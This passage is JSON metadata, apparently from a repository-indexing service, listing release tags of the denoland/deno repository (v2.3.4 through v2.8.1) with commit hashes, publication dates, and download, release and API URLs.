8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/de